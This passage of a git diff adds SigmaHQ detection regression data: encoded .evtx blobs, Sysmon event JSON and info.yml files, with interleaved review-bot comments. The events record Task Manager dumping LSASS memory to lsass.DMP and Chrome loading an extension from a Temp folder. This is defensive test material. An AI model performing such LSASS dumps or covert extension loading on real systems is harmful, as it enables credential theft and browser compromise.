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 Uqj8}t(@aJO^f93~5Y>nOKS){V`Tzg` literal 0 HcmV?d00001 diff --git a/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.json b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.json new file mode 100644 index 000000000..811d5f7a9 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.json 
@@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:50:20.590884Z" + } + }, + "EventRecordID": 53968, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:50:20.576", + "ProcessGuid": "5AA13A44-10B3-68FC-4E1E-000000004002", + "ProcessId": 2956, + "Image": "C:\\Windows\\system32\\taskmgr.exe", + "TargetFilename": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\lsass.DMP", + "CreationUtcTime": "2025-10-24 23:50:20.576", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml new file mode 100644 index 000000000..13c91674b --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml @@ -0,0 +1,13 @@ +id: 55db307d-4a36-4594-bea8-7d114714d3b4 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 69ca12af-119d-44ed-b50f-a47af0ebc364 + title: LSASS Process Memory Dump Creation Via Taskmgr.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.evtx 
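Review bot: `description: N/A` in info.yml should document the sample, which the JSON shows is a Sysmon Event ID 11 from `C:\Windows\system32\taskmgr.exe` writing `C:\Users\ADMINI~1\AppData\Local\Temp\lsass.DMP`; note in particular that the `TargetFilename` uses the 8.3 short name `ADMINI~1` and an upper-case `.DMP` extension, so a reader should know this is the genuine form Task Manager produced rather than a hand-edited path, and that the rule `LSASS Process Memory Dump Creation Via Taskmgr.EXE` is expected to match it case-insensitively. As with the other fixtures in this change, the `.json` twin of the `.evtx` is not referenced by `regression_tests_info` (`type: evtx`, `.evtx` path only), so state what it is for, and consider a 0-match sample (a `taskmgr.exe` dump of a non-LSASS process) so the regression guards the image/filename pairing, not just the presence of a dump file.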
diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx new file mode 100644 index 0000000000000000000000000000000000000000..56a66952d548d82613fb335b8c4f6fa85628f484 GIT binary patch literal 69632 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≤?{ctaA9dbJu_P@43C7hGF(#{3C1_Wynl~ zyvDfT8MA9`Ev}&LAw)A{nz?4e?b19b^CUWfQ^hhqJT-DRP4fQ)-ni>~sUAr3G|`8{ zb02K!#eE1?jkr>uv-V~kUF&q*Zp%1wKzUQWd;X7e+yi!9@IyD4EP=>0N}N4c9e<4Y zm3kCsAJ09B7;?UhcCPP)YO=XaU}ni_Wy0kEX4na=$zzc3ho(zwGV)P-D*blRWr@r3y=G@E7KUlpFB5(RA zT7SNq2Y!!~at#O=I2pm6$}|#(pc<1CyVroA>L2Rd*U;v=$eC|LYO~5fA|p z5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo z0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p z5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo 
z0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p q5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fFjx2>b^MfrtA5 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.json b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.json new file mode 100644 index 000000000..aea7029d1 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:25:03.181097Z" + } + }, + "EventRecordID": 32923086, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:25:03.169", + "ProcessGuid": "5AA13A44-ADCF-68FE-295E-000000004002", + "ProcessId": 4788, + "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", + "FileVersion": "141.0.7390.123", + "Description": "Google Chrome", + "Product": "Google Chrome", + "Company": "Google LLC", + "OriginalFileName": "chrome.exe", + "CommandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --load-extension=\"C:\\Users\\user\\AppData\\Local\\Temp\\HHe2lr\"", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
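Review bot: the sample's `User` is `ATTACKRANGE\Administrator` while `CommandLine` loads the extension from `C:\Users\user\AppData\Local\Temp\HHe2lr`, a different profile's Temp directory; the event still exercises the `--load-extension` marker the rule keys on, but the mismatch suggests the command line was staged rather than captured from an ordinary session, and that is worth stating in the accompanying info.yml `description` so that nobody later reads the user/path discrepancy as a detection anomaly or "fixes" the test data to match.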
diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml new file mode 100644 index 000000000..48a2dca40 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml @@ -0,0 +1,12 @@ +id: e159e6ce-c717-4a38-af44-ff8c4f011c37 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21 + title: Chromium Browser Instance Executed With Custom Extension +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx 
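Review bot: `regression_tests_info` here carries no `match_count`, whereas the file_event_win_taskmgr_lsass_dump info.yml earlier in this patch sets `match_count: 1`; if the CI script treats the field as required this test will fail to load, and if it defaults to 1 that default should be documented so the two files are not read as intentionally different. The same omission appears in the mockbin_abuse and tor_execution info.yml files that follow. `description: N/A` is also a placeholder that should say what was executed (Chrome started with `--load-extension` pointing at a Temp directory, per the JSON above).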
diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx new file mode 100644 index 0000000000000000000000000000000000000000..b078b6611dca3789b8e9c1b45061e1ff34392f6d GIT binary patch literal 69632 zcmeHQd2F1;6@R;4Z)_*)jUfRV0ysc{#IfVs>l`H;+Z#d>NON%296n0`GZ1{Xt`8DtF{OU2`Q?25k!#?RY9##tBO`2s1T(jaeu#=Z@l~M<#iIA z4SBozcE4lh&6_uG-pu=bb99XiCWc1_B>fZgZrqFipp=L#45SA+;p_OPpMB+oi6{Y; zfJ#6mpb}6Cs0363Dgl*%NN@K1ZI>#*T`VU(CA)q-hHnBdr1kPz`?Ub-oN?z zn`R_DLjb1J_nn^~N)2{FSmcT_k^hv6{4}+!HYxjMwXDK-Li%uL z0AYG?UWfl-+!>cKT#d;fLe}AW4EI;b9e6g1|3<0Dw;5;k62tGnbn+9vt6*Si>LZku zE4Q(oVc8*fg7TzE5egoknz|8uxf1>G?lReCQa^yS`VndzPg`*$oHA~HI3(AA*?o8@ zQdud1@C}|mEMFXwjdHt*iAPb1mc&bBD}vqSh4{Ei4$u#!X*-34X^mHLgJt}3C5`{lgO#1TRBgnVHyP%d&{9JVbYco^OPe} zgz7RiwGU}HBl4?Xlp_NN4db_)glzF%MLtlPLS8D~EcbM_4*@6e^|&aLvM^06i}wEZ zGDvvHldTg#Wx14<1Qr@~qA}*@KB#C1LiRwBMh)LAw1pA~1*WFh4A82v;MRh+zdRauGs=owXj^5|&-aG1K;Py+F<`2~}3fvXG$Zf}IPQ1A2_+%;vF77E75_ z;VCKr&Ulnbg$ak~=6*e{7D`mE!v8%L%M2CQR?5B3YW{nH$WNjo|2Xi8d02|7!cQra z-U^=mrmR-3$GuTVWDL@ofQ+m;+K1~=xiz-``W3JIwd3V2;g5$O`s}UQ#$RP>B}GA5 zTb-p`t!e+prpcIVPHR+dNq(sUXewi1ZrSEZH3YB8B zL_G~gphh`)NkH1nrQZw(Bc*xbbRs+(KWg^=>GBFj!g=Ilo2Guqlx8OwnU^OlZ5XR2 zYucR%TV}(ydHJM#ynHT%-jIvkI7ShEL|lH7rB$|#Pnux~Q47({v`qk;3)@5lFMW=4RzcC#$VH)78@L*){3~`Wk8gzpq8%rCi4rlCJG=Q@Pa8{3_ z2{~wzHk`HNo0&%SbQ-gLX8Tn8P5n-Cl#QQ@PnjexhK%{G#g{d#2a=*)XU$%R8asei z+dl1wWGC>v*F3L<)Y%EDMl9>xOnB}MTXyz%dX1&1Gr8XlC&gZ`f~*^G-hlrmXvrYb zjp4TiacWU2?I@E0bC0%>TGfW<1Nd!2tY)0G;H)0utnS2Nmv*A;JJ9joj{j@mj&wm+ z;>d@!Rpffo=$5s#)We6a`)uglA8w~2iurJgLXMPH@%Lc=<7whnhX5W-eVg4C521=Goa?=WW4BcSjb>V3nC~v@*VX5EECU!f{ zNvi>O+YyR9#BfGwCh%>-(+;H9VDi&}=ae>iV7N}h6LZDbq}^=p#|-_Iu<%<^mnk`N zw$40l#8oTeQErSudgOisXttXa8*qo5)FVU}QfAuqhEJB%_ZA!(dYLv47GphZwJmjj zpR(KQQ?hm02VNRc{(U&>N1e9y-PN!3coS%Mook#uUN!iit%kuNB;J6uYf(q&*s~Qn 
zi1SuR!0}XryS>OM-TJS4`EoXVBCiH_Lz?VOkD?}ynHtOR{`QVO6s;lq7Hqe>QO9~v zD`(=V2lDSVrBOUQ4MIQqp%IPKa!N19REWct<7Q~lc36Wh^v-yv4l>(O->`C6` zFq7Ji(5Rh=yVcVs_FQNeM?lB^*FbC8s;~@auOYLK!5Sd2wj$@@2;guZUiaQ-oiQ0( zgkem$!Q)z-x8X3(kfdW<@4#K*lX#W9j?;8Z>mCpYpL#5-5v*m$u;O4aJ9c#$o+Pqh zR@t$tbqJjeqcWaXf!Nd%(8!BPp{pY~u_zRg?mf^%ZC}|$BJ0Ic`+h(Bt92xs1by-V?qW* zm>VppElMm1xFMJ^pL;)e`thrYpgSz6&oe(IuqXT!9~LAV*UdZc@bK0hD>nr?O7?vE zzxO=z7nqu&CCrEWtU-?ac+Vxc6ZTt}yvPrIRX>Gg*(l^hgSKYGr}vt{K^0o9F@rL& zzv1r>Yy^TpxNsUR+LS@FAsfwT9-7uC_Ryq_8T3|VqgUyp=f`J>K)}l+4nXVfmzY6s z(q%s1M=jOs_Hd|zCC3*4J{fTz*0f~llRCrO29Sx6#aB^?VPp78*BQV!eLgYyv3kVLt~L5PJEf^pEhvM55U z&|^7w$&sNRHmmShCh;IKky-+?}TvIkH9 zm3YEHPQM}(@u@RD#ZKfsVKkm{urK@e8t<+fFAwPBS!Agmy3qhXmvW;gwjZI#;fdL| zAN0}qve$VOeW1{a(7F7Qx#orlL~oIBL!^jrUW-FEjgU)w5pmNBEiM+lX@Cy1rsgWC 